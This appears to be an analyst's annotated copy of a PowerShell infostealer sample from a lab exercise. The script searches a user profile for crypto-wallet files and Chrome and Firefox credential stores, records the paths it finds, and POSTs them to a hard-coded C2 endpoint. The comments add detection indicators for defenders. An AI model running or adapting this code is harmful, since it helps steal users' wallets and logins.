# Analyst summary (from the code visible in this listing):
#   1. Prints a banner to the console.
#   2. Checks for well-known crypto-wallet and browser credential-store paths
#      in the current user's profile and appends the paths that exist to a
#      local text file.
#   3. POSTs that text file to a hard-coded HTTP endpoint.
# Only path strings are recorded; nothing here opens, copies or decrypts the
# wallet or credential files themselves.
# Indicators present in this sample: the file name "stolen_info.txt" and the
# URL "http://papash3ll.thm/data".
# Detection note: with PowerShell script block logging enabled (event 4104),
# the function names and literals below appear in the logged script text.

# Writes a six-line banner to the host. Write-Host prints to the console and
# returns nothing to the pipeline.
function Print-AsciiArt {
    Write-Host " ____ _ ___ _____ ___ _ _ "
    Write-Host " / ___| | | |_ _||_ _| / __| | | | |"
    Write-Host "| | _ | | | | | | | | | |_| |"
    Write-Host "| |_| | | |___ | | | | | |__ | _ |"
    Write-Host " \____| |_____| |___| |_| \___| |_| |_|"
    Write-Host " Created by the one and only M.M."
}

# Print the banner as soon as the script starts.
Print-AsciiArt

# Staging file for everything collected below. The path is relative, so the
# file is created in whatever the working directory is at run time.
# Detection note: creation of a file with this name is a host artefact, and
# nothing in this listing deletes it afterwards.
$infoFilePath = "stolen_info.txt"

# Records which of four default wallet locations exist for the current user.
# Reads:  $env:USERPROFILE and the script-level $infoFilePath.
# Writes: a section header, then one "Found wallet: <path>" line per hit,
#         appended to $infoFilePath.
function Search-ForWallets {
    # Default locations checked: Bitcoin, Ethereum keystore, Monero, Dogecoin.
    $walletPaths = @(
        "$env:USERPROFILE\.bitcoin\wallet.dat",
        "$env:USERPROFILE\.ethereum\keystore\*",
        "$env:USERPROFILE\.monero\wallet",
        "$env:USERPROFILE\.dogecoin\wallet.dat"
    )

    # The header is written even when no wallet path is found.
    Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"

    foreach ($path in $walletPaths) {
        # Test-Path on the wildcard entry is true when anything matches it.
        # The logged value is the pattern itself, not the matched file names.
        if (Test-Path $path) {
            Add-Content -Path $infoFilePath -Value "Found wallet: $path"
        }
    }
}

# Records whether the default Chrome and Firefox credential stores exist.
# Reads:  $env:USERPROFILE, $env:APPDATA and the script-level $infoFilePath.
# Writes: a section header, then one line per store found, appended to
#         $infoFilePath.
# Only the "Default" Chrome profile and Firefox profiles matching
# "*.default-release" are checked.
function Search-ForBrowserCredentials {
    # Chrome's "Login Data" (a SQLite database, per the original comment) and
    # Firefox's logins.json.
    $chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"

    # The header is written even when neither store is found.
    Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"

    if (Test-Path $chromePath) {
        Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
    }

    # The wildcard in the profile directory means the logged value is the
    # pattern, not the resolved profile path.
    if (Test-Path $firefoxPath) {
        Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
    }
}

# Uploads the staging file to the hard-coded endpoint.
# Reads: the script-level $infoFilePath.
# Side effect: one outbound HTTP POST carrying the file's text as its body.
# Detection note: the URL uses plain http://, so the host name, the "/data"
# path and the body (including the "### ... ###" section headers) are visible
# to proxy or network inspection. On the host, the signal is a PowerShell
# process making an outbound web request.
function Send-InfoToC2Server {
    $c2Url = "http://papash3ll.thm/data"

    # -Raw returns the whole file as a single string rather than an array of lines.
    $data = Get-Content -Path $infoFilePath -Raw

    # No error handling here: a failed request surfaces as a PowerShell error.
    Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}

# Main flow: enumerate wallet paths, enumerate browser stores, then upload.
# Each step appends to the same staging file before the upload reads it.
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server